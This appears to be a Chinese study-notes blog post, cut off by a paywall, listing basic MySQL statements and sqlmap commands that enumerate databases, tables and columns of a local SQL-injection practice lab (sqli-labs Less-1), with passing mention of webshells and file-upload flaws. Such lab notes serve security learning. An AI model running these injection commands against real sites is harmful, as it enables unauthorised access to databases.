这篇博客主要介绍了MySQL的基础操作,包括常用语句和数据库管理,并详细讲解了SQLMap的使用,从基本命令到深入的数据库探测。同时,提到了SQL注入的手工练习和一句话木马、文件上传漏洞的概念,晚上任务涵盖了SQLMap的高级技巧和Docker环境配置。
1.mysql常用语句讲解,和基本操作预习
(1)mysql -uroot -ppw
(2)show databases;
(3)use db;
(4)show tables;
(5)select * from user;
(6)select * from user where id =1;
增
insert into
删
改
查
select
2.sqlmap的基本使用预习
python2 sqlmap.py -u ‘http://192.168.37.130/Less-1/index.php?id=1’
python3 sqlmap.py -u ‘http://192.168.37.130/Less-1/index.php?id=1’
sqlmap.py -u ‘http://192.168.37.130/Less-1/index.php?id=1’
sqlmap -u ‘http://192.168.37.130/Less-1/index.php?id=1’
sqlmap -u http://192.168.37.130/Less-1/index.php?id=1
sqlmap -u ‘http://192.168.37.130/Less-1/index.php?id=1’ --current-db 查询当前使用的数据库
sqlmap -u ‘http://192.168.37.130/Less-1/index.php?id=1’ --dbs 查询所有数据库
sqlmap -u ‘http://192.168.37.130/Less-1/index.php?id=1’ -D security -tables
sqlmap -u ‘http://192.168.37.130/Less-1/index.php?id=1’ -D security -T users --columns
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
